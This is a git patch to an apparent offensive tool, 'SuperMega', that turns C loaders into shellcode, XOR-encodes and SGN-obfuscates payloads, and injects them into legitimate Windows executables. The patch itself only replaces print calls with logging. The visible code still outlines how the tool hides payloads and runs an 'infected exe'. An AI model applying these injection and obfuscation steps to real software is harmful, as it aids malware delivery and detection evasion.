From abe757507be92f59f21abdb05232aecde1ba2ff5 Mon Sep 17 00:00:00 2001 From: Dobin Date: Thu, 15 Feb 2024 07:54:10 +0000 Subject: [PATCH] refactor: better logging --- helper.py | 35 +++++++++++--------- model.py | 7 ++-- pehelper.py | 13 +++++--- phases/assembler.py | 18 ++++++----- phases/compiler.py | 27 ++++++++-------- phases/injector.py | 15 +++++---- phases/templater.py | 3 +- supermega.py | 79 +++++++++++++++++++++++++++++++++------------ 8 files changed, 125 insertions(+), 72 deletions(-) diff --git a/helper.py b/helper.py index 36855c6..032d8bc 100644 --- a/helper.py +++ b/helper.py @@ -6,11 +6,14 @@ import pathlib import sys import pefile import glob +import logging from config import config from project import project from pehelper import * +logger = logging.getLogger("Helper") + SHC_VERIFY_SLEEP = 0.1 @@ -36,7 +39,7 @@ def get_code_section_data(pe_file): # if '.text' in section.Name.decode().rstrip('\x00'): # data = section.get_data() # data = remove_trailing_null_bytes(data) - # print(" > 0x{:X} Code Size: {} (raw code section size: {})".format( + # logger.info(" > 0x{:X} Code Size: {} (raw code section size: {})".format( # section.VirtualAddress, # len(data), section.SizeOfRawData)) # return data @@ -45,18 +48,18 @@ def get_code_section_data(pe_file): if section == None: raise Exception("Code section not found.") - print("--[ Code section: {}".format(section.Name.decode().rstrip('\x00'))) + logger.info("--[ Code section: {}".format(section.Name.decode().rstrip('\x00'))) data = section.get_data() data = remove_trailing_null_bytes(data) - print(" > 0x{:X} Code Size: {} (raw code section size: {})".format( + logger.info(" > 0x{:X} Code Size: {} (raw code section size: {})".format( section.VirtualAddress, len(data), section.SizeOfRawData)) return data except FileNotFoundError: - print(f"File not found: {pe_file}") + logger.info(f"File not found: {pe_file}") except pefile.PEFormatError: - print(f"Invalid PE file: {pe_file}") + logger.info(f"Invalid PE file: {pe_file}") def write_code_section(pe_file, new_data): @@ -72,12 +75,12 @@ def write_code_section(pe_file, new_data): with open(pe_file, 'r+b') as f: f.seek(file_offset) f.write(new_data) - #print("Successfully overwritten the .text section with new data.") + #logger.info("Successfully overwritten the .text section with new data.") break def clean_files(): - print("--[ Remove old files ]") + logger.info("--[ Remove old files ]") files_to_clean = [ # compile artefacts in current dir @@ -111,22 +114,22 @@ def run_process_checkret(args, check=True): if ret.stderr != None: f.write(ret.stderr) if ret.returncode != 0 and check: - print("----! FAILED Command: {}".format(" ".join(args))) + logger.info("----! FAILED Command: {}".format(" ".join(args))) if ret.stdout != None: - print(ret.stdout.decode('utf-8')) + logger.info(ret.stdout.decode('utf-8')) if ret.stderr != None: - print(ret.stderr.decode('utf-8')) + logger.info(ret.stderr.decode('utf-8')) raise Exception("Command failed: " + " ".join(args)) if project.show_command_output: - print("> " + " ".join(args)) + logger.info("> " + " ".join(args)) if ret.stdout != None: - print(ret.stdout.decode('utf-8')) + logger.info(ret.stdout.decode('utf-8')) if ret.stderr != None: - print(ret.stderr.decode('utf-8')) + logger.info(ret.stderr.decode('utf-8')) def try_start_shellcode(shc_file): - print("--[ Blindly execute shellcode: {} ]".format(shc_file)) + logger.info("--[ Blindly execute shellcode: {} ]".format(shc_file)) subprocess.run([ config.get["path_runshc"], shc_file, @@ -150,6 +153,6 @@ def delete_all_files_in_directory(directory_path): for file_path in files: try: os.remove(file_path) - #print(f"Deleted {file_path}") + #logger.info(f"Deleted {file_path}") except Exception as e: - print(f"Error deleting {file_path}: {e}") \ No newline at end of file + logger.info(f"Error deleting {file_path}: {e}") \ No newline at end of file diff --git a/model.py b/model.py index d54be34..b85088f 100644 --- a/model.py +++ b/model.py @@ -2,6 +2,9 @@ from typing import Dict import pehelper import pefile from enum import Enum +import logging + +logger = logging.getLogger("Model") class FilePath(str): @@ -129,6 +132,6 @@ class ExeCapabilities(): def print(self): - print("--( Capabilities: ") + logger.info("--( Capabilities: ") for _, cap in self.capabilities.items(): - print(" " + str(cap)) \ No newline at end of file + logger.info(" " + str(cap)) \ No newline at end of file diff --git a/pehelper.py b/pehelper.py index 64a2270..5ffb1af 100644 --- a/pehelper.py +++ b/pehelper.py @@ -3,6 +3,9 @@ import pefile import pprint from keystone import Ks, KS_ARCH_X86, KS_MODE_64 from capstone import Cs, CS_ARCH_X86, CS_MODE_64 +import logging + +logger = logging.getLogger("PEHelper") def get_code_section(pe): @@ -10,13 +13,13 @@ def get_code_section(pe): for sect in pe.sections: name = sect.Name.decode() - #print("Checking: {} and 0x{:x}".format(name, sect.Characteristics)) + #logger.info("Checking: {} and 0x{:x}".format(name, sect.Characteristics)) if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']: if entrypoint >= sect.VirtualAddress and entrypoint <= sect.VirtualAddress + sect.SizeOfRawData: return sect #else: - # print("NOOO: 0x{:x} 0x{:x} 0x{:x}".format( + # logger.info("NOOO: 0x{:x} 0x{:x} 0x{:x}".format( # entrypoint, # sect.VirtualAddress, # sect.VirtualAddress + sect.SizeOfRawData, @@ -42,7 +45,7 @@ def get_rwx_section(pe): # keystone/capstone stuff def assemble_and_disassemble_jump(current_address, destination_address): - #print(" Make jmp from 0x{:X} to 0x{:X}".format( + #logger.info(" Make jmp from 0x{:X} to 0x{:X}".format( # current_address, destination_address #)) # Calculate the relative offset @@ -57,8 +60,8 @@ def assemble_and_disassemble_jump(current_address, destination_address): # Disassemble the machine code using Capstone #cs = Cs(CS_ARCH_X86, CS_MODE_64) #disassembled = next(cs.disasm(machine_code, current_address)) - #print(f"Machine Code: {' '.join(f'{byte:02x}' for byte in machine_code)}") - #print(f"Disassembled: {disassembled.mnemonic} {disassembled.op_str}") + #logger.info(f"Machine Code: {' '.join(f'{byte:02x}' for byte in machine_code)}") + #logger.info(f"Disassembled: {disassembled.mnemonic} {disassembled.op_str}") return machine_code diff --git a/phases/assembler.py b/phases/assembler.py index 1d82b4b..971abd8 100644 --- a/phases/assembler.py +++ b/phases/assembler.py @@ -1,5 +1,6 @@ import pefile import pprint +import logging from model import * from helper import * @@ -7,11 +8,12 @@ from config import config from observer import observer from project import project +logger = logging.getLogger("Assembler") def make_shc_from_asm(asm_file, exe_file, shc_file): - print("--[ Assemble to exe: {} -> {} -> {} ]".format(asm_file, exe_file, shc_file)) + logger.info("--[ Assemble to exe: {} -> {} -> {} ]".format(asm_file, exe_file, shc_file)) - print("---[ Assemble ASM to EXE: {} -> {} ]".format(asm_file, exe_file)) + logger.info("---[ Assemble ASM to EXE: {} -> {} ]".format(asm_file, exe_file)) run_process_checkret([ config.get("path_ml64"), asm_file, @@ -20,20 +22,20 @@ def make_shc_from_asm(asm_file, exe_file, shc_file): "/entry:AlignRSP" ]) if not os.path.isfile(exe_file): - print("Error") + logger.error("Error") return - print("---[ EXE to SHC: {} -> {} ]".format(exe_file, shc_file)) + logger.info("---[ EXE to SHC: {} -> {} ]".format(exe_file, shc_file)) code = get_code_section_data(exe_file) with open(shc_file, 'wb') as f: f.write(code) return code - #print("---[ Shellcode from {} written to: {} (size: {}) ]".format(exe_file, shc_file, len(code))) + #logger.info("---[ Shellcode from {} written to: {} (size: {}) ]".format(exe_file, shc_file, len(code))) def merge_loader_payload(main_shc_file): - print("--[ Merge stager: {} + {} -> {} ] ".format( + logger.info("--[ Merge stager: {} + {} -> {} ] ".format( main_shc_file, project.payload, main_shc_file)) with open(main_shc_file, 'rb') as input1: data_stager = input1.read() @@ -44,10 +46,10 @@ def merge_loader_payload(main_shc_file): pass elif project.decoder_style == DecoderStyle.XOR_1: xor_key = 0x42 - print("---[ XOR payload with key 0x{:x}".format(xor_key)) + logger.info("---[ XOR payload with key 0x{:x}".format(xor_key)) data_payload = bytes([byte ^ xor_key for byte in data_payload]) - print("---[ Size: Stager: {} and Payload: {} Sum: {} ]".format( + logger.info("---[ Size: Stager: {} and Payload: {} Sum: {} ]".format( len(data_stager), len(data_payload), len(data_stager)+len(data_payload))) with open(main_shc_file, 'wb') as output: diff --git a/phases/compiler.py b/phases/compiler.py index cd89858..5819136 100644 --- a/phases/compiler.py +++ b/phases/compiler.py @@ -3,16 +3,17 @@ from config import config import os import pprint from observer import observer - +import logging from project import project from model import * +logger = logging.getLogger("Compiler") use_templates = True def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities): - print("--[ C to ASM: {} -> {} ]".format(c_file, asm_file)) + logger.info("--[ C to ASM: {} -> {} ]".format(c_file, asm_file)) asm = { "initial": "", @@ -22,7 +23,7 @@ def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities): } # Phase 1: C To Assembly - print("---[ Make ASM from C: {} ]".format(c_file)) + logger.info("---[ Make ASM from C: {} ]".format(c_file)) run_process_checkret([ config.get("path_cl"), "/c", @@ -32,28 +33,28 @@ def make_c_to_asm(c_file, asm_file, payload_len, capabilities: ExeCapabilities): c_file, ]) if not os.path.isfile(asm_file): - print("Error: Compiling failed") + logger.error("Error: Compiling failed") return asm["initial"] = file_readall_text(asm_file) # Phase 1.2: Assembly fixup - print("---[ Fixup : {} ]".format(asm_file)) + logger.info("---[ Fixup : {} ]".format(asm_file)) if not fixup_asm_file(asm_file, payload_len, capabilities): - print("Error: Fixup failed") + logger.error("Error: Fixup failed") return else: asm["fixup"] = file_readall_text(asm_file) # Phase 1.1: Assembly cleanup asm_clean_file = asm_file + ".clean" - print("---[ Cleanup: {} ]".format(asm_file)) + logger.info("---[ Cleanup: {} ]".format(asm_file)) run_process_checkret([ config.get("path_masmshc"), asm_file, asm_clean_file, ]) if not os.path.isfile(asm_clean_file): - print("Error: Cleanup filed") + logger.info("Error: Cleanup filed") return else: shutil.move(asm_clean_file, asm_file) @@ -91,19 +92,19 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities): func_name = lines[idx][lines[idx].find("__imp_")+6:].rstrip() exeCapability = capabilities.get(func_name) if exeCapability == None: - print("Error Capabilities not: {}".format(func_name)) + logger.error("Error Capabilities not: {}".format(func_name)) else: randbytes: bytes = os.urandom(6) lines[idx] = bytes_to_asm_db(randbytes) + "\r\n" exeCapability.id = randbytes - print(" > Replace func name: {} with {}".format( + logger.info(" > Replace func name: {} with {}".format( func_name, randbytes)) # replace external reference with shellcode reference for idx, line in enumerate(lines): if "supermega_payload" in lines[idx]: - print(" > Replace external reference at line: {}".format(idx)) + logger.info(" > Replace external reference at line: {}".format(idx)) #lines[idx] = lines[idx].replace( # "mov r8, QWORD PTR supermega_payload", # "lea r8, [shcstart]" @@ -121,14 +122,14 @@ def fixup_asm_file(filename, payload_len, capabilities: ExeCapabilities): # replace payload length for idx, line in enumerate(lines): if "11223344" in lines[idx]: - print(" > Replace payload length at line: {}".format(idx)) + logger.info(" > Replace payload length at line: {}".format(idx)) lines[idx] = lines[idx].replace("11223344", str(payload_len)) break # add label at end of code for idx, line in enumerate(lines): if lines[idx].startswith("END"): - print(" > Add end of code label at line: {}".format(idx)) + logger.info(" > Add end of code label at line: {}".format(idx)) lines.insert(idx-1, "shcstart:\r\n") break diff --git a/phases/injector.py b/phases/injector.py index 87b1163..17863fe 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -1,18 +1,21 @@ from helper import * import shutil import pprint +import logging from pehelper import * from model import * from project import project +logger = logging.getLogger("Injector") + def inject_exe(shc_file: FilePath): exe_in: FilePath = project.inject_exe_in exe_out: FilePath = project.inject_exe_out exe_capabilities: ExeCapabilities = project.exe_capabilities - print("--[ Injecting: {} into: {} -> {} ]".format( + logger.info("--[ Injecting: {} into: {} -> {} ]".format( shc_file, exe_in, exe_out )) @@ -36,13 +39,13 @@ def inject_exe(shc_file: FilePath): code = get_code_section_data(exe_out) for cap in exe_capabilities.get_all().values(): if not cap.id in code: - print("Capability ID {} not found, abort".format(cap.id)) + logger.error("Capability ID {} not found, abort".format(cap.id)) raise Exception() off = code.index(cap.id) current_address = off + exe_capabilities.image_base + exe_capabilities.text_virtaddr destination_address = cap.addr - print(" Replace at 0x{:x} with call to 0x{:x}".format( + logger.info(" Replace at 0x{:x} with call to 0x{:x}".format( current_address, destination_address )) jmp = assemble_and_disassemble_jump( @@ -53,7 +56,7 @@ def inject_exe(shc_file: FilePath): def verify_injected_exe(exefile): - print("---[ Verify infected exe: {} ]".format(exefile)) + logger.info("---[ Verify infected exe: {} ]".format(exefile)) # remove indicator file pathlib.Path(verify_filename).unlink(missing_ok=True) @@ -62,11 +65,11 @@ def verify_injected_exe(exefile): ], check=False) time.sleep(SHC_VERIFY_SLEEP) if os.path.isfile(verify_filename): - print("---> Verify OK. Infected exe works (file was created)") + logger.info("---> Verify OK. Infected exe works (file was created)") # better to remove it immediately os.remove(verify_filename) return True else: - print("---> Verify FAIL. Infected exe does not work (no file created)") + logger.error("---> Verify FAIL. Infected exe does not work (no file created)") return False diff --git a/phases/templater.py b/phases/templater.py index 85e19a4..1babf07 100644 --- a/phases/templater.py +++ b/phases/templater.py @@ -1,6 +1,7 @@ from jinja2 import Template import pprint import shutil +import logging from helper import * from config import config @@ -9,7 +10,7 @@ from model import * from observer import observer use_templates = True - +logger = logging.getLogger("Assembler") # INPUT: # plugins/ diff --git a/supermega.py b/supermega.py index 2ed18f6..9861ea0 100644 --- a/supermega.py +++ b/supermega.py @@ -4,16 +4,15 @@ from helper import * import argparse from typing import Dict import pickle +import logging from model import * from config import config from pehelper import * - import phases.templater import phases.compiler import phases.assembler import phases.injector - from observer import observer from project import project @@ -23,8 +22,47 @@ main_exe_file = os.path.join(build_dir, "main.exe") main_shc_file = os.path.join(build_dir, "main.bin") + +# ANSI escape sequences for colors +class LogColors: + HEADER = '\033[95m' + BLUE = '\033[94m' + GREEN = '\033[92m' + WARNING = '\033[93m' + FAIL = '\033[91m' + ENDC = '\033[0m' + BOLD = '\033[1m' + UNDERLINE = '\033[4m' + + +# Custom formatter to include colors in log output +class CustomFormatter(logging.Formatter): + #format = "%(asctime)s - %(name)-12s - [%(levelname)-8s] - %(message)s (%(filename)s:%(lineno)d)" + format = "(%(filename)-12s) %(message)s" + + FORMATS = { + logging.DEBUG: format, + logging.INFO: format, + logging.WARNING: LogColors.WARNING + format + LogColors.ENDC, + logging.ERROR: LogColors.FAIL + format + LogColors.ENDC, + logging.CRITICAL: LogColors.FAIL + LogColors.BOLD + format + LogColors.ENDC + } + + def format(self, record): + log_fmt = self.FORMATS.get(record.levelno) + formatter = logging.Formatter(log_fmt, datefmt="%Y-%m-%d %H:%M:%S") + return formatter.format(record) + + +# Configure logging +handler = logging.StreamHandler() +handler.setFormatter(CustomFormatter()) +logging.basicConfig(level=logging.DEBUG, handlers=[handler]) +logger = logging.getLogger("ExploitLogger") + + def main(): - print("Super Mega") + logger.info("Super Mega") config.load() parser = argparse.ArgumentParser(description='SuperMega shellcode loader') @@ -65,19 +103,19 @@ def main(): project.inject_exe_out = "out/wifiinfoview.exe-a.exe" else: - print("Unknown verify option {}, use std/iat".format(args.verify)) + logger.info("Unknown verify option {}, use std/iat".format(args.verify)) else: project.try_start_final_infected_exe = True if args.shellcode: if not os.path.isfile(args.shellcode): - print("Could not find: {}".format(args.shellcode)) + logger.info("Could not find: {}".format(args.shellcode)) return project.payload = args.shellcode if args.inject: if not os.path.isfile(args.inject): - print("Could not find: {}".format(args.inject)) + logger.info("Could not find: {}".format(args.inject)) return project.inject = True project.inject_exe_in = args.inject @@ -109,7 +147,7 @@ def start(): #observer.add_json("capabilities_a", project.exe_capabilities) #observer.add_json("options", options) - print("--[ SourceStyle: {}".format(project.source_style.name)) + logger.info("--[ SourceStyle: {}".format(project.source_style.name)) # Copy: loader C files into working directory: build/ phases.templater.create_c_from_template() @@ -141,13 +179,13 @@ def start(): phases.assembler.merge_loader_payload(main_shc_file) if project.verify and project.source_style == SourceStyle.peb_walk: - print("--[ Verify final shellcode ]") + logger.info("--[ Verify final shellcode ]") if not verify_shellcode(main_shc_file): - print("Could not verify, still continuing") + logger.info("Could not verify, still continuing") #return if project.try_start_final_shellcode: - print("--[ Test Append shellcode ]") + logger.info("--[ Test Append shellcode ]") try_start_shellcode(main_shc_file) # copy it to out @@ -158,7 +196,7 @@ def start(): # after we packed everything (so jmp to end of code still works) #if options["obfuscate_shc_loader"] and project.exe_capabilities.rwx_section != None: if project.exe_capabilities.rwx_section != None: - print("--[ Use SGN]") + logger.info("--[ Use SGN]") obfuscate_shc_loader(main_shc_file, main_shc_file + ".sgn") observer.add_code("payload_sgn", file_readall_binary(main_shc_file + ".sgn")) @@ -174,13 +212,13 @@ def start(): phases.injector.inject_exe(main_shc_file) if project.verify: - print("--[ Verify final exe ]") + logger.info("--[ Verify final exe ]") if phases.injector.verify_injected_exe(project.inject_exe_out): #debug_data["infected_exe"] = file_readall_binary(options["inject_exe_out"]) pass if project.try_start_final_infected_exe: - print("--[ Start infected exe ]") + logger.info("--[ Start infected exe ]") run_process_checkret([ project.inject_exe_out, ], check=False) @@ -196,7 +234,7 @@ def start(): def obfuscate_shc_loader(file_shc_in, file_shc_out): - print("--[ Convert with SGN ]") + logger.info("--[ Convert with SGN ]") if True: path_sgn = r'C:\tools\sgn2.0\sgn.exe' run_process_checkret([ @@ -214,19 +252,19 @@ def obfuscate_shc_loader(file_shc_in, file_shc_out): "-o", "{}".format(file_shc_out), ], check=True) if not os.path.isfile(file_shc_out): - print("Error") + logger.info("Error") return else: - print(" > Success obfuscation") + logger.info(" > Success obfuscation") pass def verify_shellcode(shc_name): - print("---[ Verify shellcode: {} ]".format(shc_name)) + logger.info("---[ Verify shellcode: {} ]".format(shc_name)) # check if directory exists if not os.path.exists(os.path.dirname(verify_filename)): - print("Error, directory does not exist for: {}".format(verify_filename)) + logger.info("Error, directory does not exist for: {}".format(verify_filename)) return # remove indicator file @@ -238,14 +276,13 @@ def verify_shellcode(shc_name): ], check=False) time.sleep(SHC_VERIFY_SLEEP) if os.path.isfile(verify_filename): - print("---> Verify OK. Shellcode works (file was created)") + logger.info("---> Verify OK. Shellcode works (file was created)") os.remove(verify_filename) return True else: - print("---> Verify FAIL. Shellcode doesnt work (file was not created)") + logger.info("---> Verify FAIL. Shellcode doesnt work (file was not created)") return False if __name__ == "__main__": main() -